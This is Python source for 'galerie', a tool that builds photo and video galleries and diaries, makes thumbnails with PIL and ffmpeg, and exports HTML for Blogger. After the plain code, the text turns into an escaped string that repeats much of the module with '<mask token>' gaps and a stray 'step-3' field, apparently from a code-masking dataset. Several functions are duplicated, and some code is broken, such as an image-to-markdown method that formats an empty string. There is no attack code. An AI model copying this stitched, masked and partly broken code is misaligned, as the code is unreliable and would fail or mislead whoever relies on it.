action='store', metavar='<root-dir>')
agroup = parser.add_argument_group('Parameters')
agroup.add_argument('--bydir', help='organize gallery by subdirectory',
action='store', default=None, choices=BOOL)
agroup.add_argument('--bydate', help='organize gallery by date',
action='store', default=None, choices=BOOL)
agroup.add_argument('--diary', help='organize gallery using markdown file diary',
action='store', default=None, choices=BOOL)
agroup.add_argument('--recursive', help='--sourcedir scans recursively',
action='store', default=None, choices=BOOL)
agroup.add_argument('--dates', help='dates interval',
action='store', default=None)
agroup.add_argument('--sourcedir', help='media directory',
action='store', default=None)
agroup.add_argument('--github_pages', help='github Pages compatibility',
action='store', default=None, choices=BOOL)
agroup.add_argument('--dest', help='output directory',
action='store')
agroup.add_argument('--forcethumb', help='force calculation of thumbnails',
action='store_true', default=False)
agroup.add_argument('--full', help='full html (versus blogger ready html)',
action='store_true', default=False)
agroup.add_argument('--check', dest='check_images', help='check availability of medias on blogger',
action='store_true')
agroup.add_argument('--url', dest='urlblogger', help='blogger post url',
action='store')
if argstring is None:
print('Type "galerie -h" for help')
sys.exit(1)
else:
args = parser.parse_args(argstring.split())
if args.update and (args.bydir or args.bydate or args.diary or args.sourcedir or
args.recursive or args.dates or args.github_pages):
error('Incorrect parameters:',
'--update cannot be used with creation parameters, use explicit command')
args.bydir = args.bydir == 'true'
args.bydate = args.bydate == 'true'
args.diary = args.diary == 'true'
args.recursive = args.recursive == 'true'
args.dates = 'source' if (args.dates is None) else args.dates
args.github_pages = args.github_pages == 'true'
args.root = (
args.create or args.gallery or args.update
or args.blogger or args.idem or args.resetcfg
)
if args.setcfg:
args.root = args.setcfg[0]
args.setcfg = args.setcfg[1:]
return args
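# Typical invocations (for illustration; the 'galerie' command name is assumed
# from the help message above):
#   galerie --gallery ./album --sourcedir ./photos --bydate true
#   galerie --update ./album
#   galerie --create ./diary --sourcedir ./photos --dates 20200101-20201231
#   galerie --blogger ./diary --url https://example.blogspot.com/2021/01/post.html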
def setup_part1(args):
"""
Made before reading config file (config file located in args.root).
Check and normalize root path.
"""
args.rootarg = args.root
rootext = os.path.splitext(args.rootarg)[1]
if rootext == '':
pass
else:
args.root = os.path.dirname(args.root)
if args.root:
args.root = os.path.abspath(args.root)
if not os.path.isdir(args.root):
if args.gallery:
os.mkdir(args.root)
else:
error('Directory not found', args.root)
def setup_part2(args):
"""
Made after reading config file.
Check for ffmpeg in path.
Create .thumbnails dir if necessary and create .nomedia in it.
Copy photobox file to destination dir.
Handle priority between command line and config file.
"""
if args.update:
args.sourcedir = args.source.sourcedir
args.bydir = args.source.bydir
args.bydate = args.source.bydate
args.diary = args.source.diary
args.recursive = args.source.recursive
args.dates = args.source.dates
args.github_pages = args.source.github_pages
elif args.gallery:
args.source.sourcedir = args.sourcedir
args.source.bydir = args.bydir
args.source.bydate = args.bydate
args.source.diary = args.diary
args.source.recursive = args.recursive
args.source.dates = args.dates
args.source.github_pages = args.github_pages
update_config(args)
if args.github_pages:
args.html_suffix = '.html'
else:
args.html_suffix = '.htm'
rootext = os.path.splitext(args.rootarg)[1]
if rootext:
args.rootname = os.path.basename(args.rootarg)
else:
args.rootname = 'index' + args.html_suffix
if args.sourcedir:
args.sourcedir = os.path.abspath(args.sourcedir)
if os.path.splitdrive(args.sourcedir)[0]:
drive, rest = os.path.splitdrive(args.sourcedir)
args.sourcedir = drive.upper() + rest
if not os.path.isdir(args.sourcedir):
error('Directory not found', args.sourcedir)
else:
if args.gallery and args.diary is False and args.update is None:
error('Directory not found', 'Use --sourcedir')
if args.dest:
args.dest = os.path.abspath(args.dest)
if args.dest is None:
args.dest = args.root
if args.blogger and args.urlblogger is None:
error('No blogger url (--url)')
if args.gallery or args.update:
# check for ffmpeg and ffprobe in path
for exe in ('ffmpeg', 'ffprobe'):
try:
check_output([exe, '-version'])
except FileNotFoundError:
error('File not found', exe)
if args.github_pages:
args.thumbrep = 'thumbnails'
else:
args.thumbrep = '.thumbnails'
args.thumbdir = os.path.join(args.dest, args.thumbrep)
if not os.path.exists(args.thumbdir):
os.mkdir(args.thumbdir)
open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()
favicondst = os.path.join(args.dest, 'favicon.ico')
if not os.path.isfile(favicondst):
faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')
shutil.copyfile(faviconsrc, favicondst)
photoboxdir = os.path.join(args.dest, 'photobox')
if not os.path.exists(photoboxdir):
photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')
shutil.copytree(photoboxsrc, photoboxdir)
if args.dates:
        if not (args.gallery or args.create):
            # silently ignored for the moment, otherwise all other commands would
            # raise a warning or an error on the default --dates value
pass
if args.dates == 'source':
pass
elif args.dates == 'diary':
if args.create:
error('Incorrect date format', args.dates)
elif re.match(r'\d+-\d+', args.dates):
date1, date2 = args.dates.split('-')
if validate_date(date1) and validate_date(date2):
args.dates = date1, date2
else:
error('Incorrect date format', args.dates)
else:
error('Incorrect date format', args.dates)
def main(argstring=None):
colorama.init()
args = parse_command_line(argstring)
setup_part1(args)
read_config(args)
setup_part2(args)
try:
if args.gallery or args.update:
create_gallery(args)
elif args.create:
create_diary(args)
elif args.blogger:
prepare_for_blogger(args)
elif args.idem:
idempotence(args)
elif args.setcfg:
setconfig_cmd(args)
except KeyboardInterrupt:
warning('Interrupted by user.')
if __name__ == '__main__':
main(' '.join(sys.argv[1:]))
size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\n<mask token>\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\n<mask token>\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, 
xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? 
'\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\n<mask token>\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n 
info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n<mask token>\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\n<mask token>\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\n<mask token>\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = 
f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. 
See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\n<mask token>\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n 
args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, 
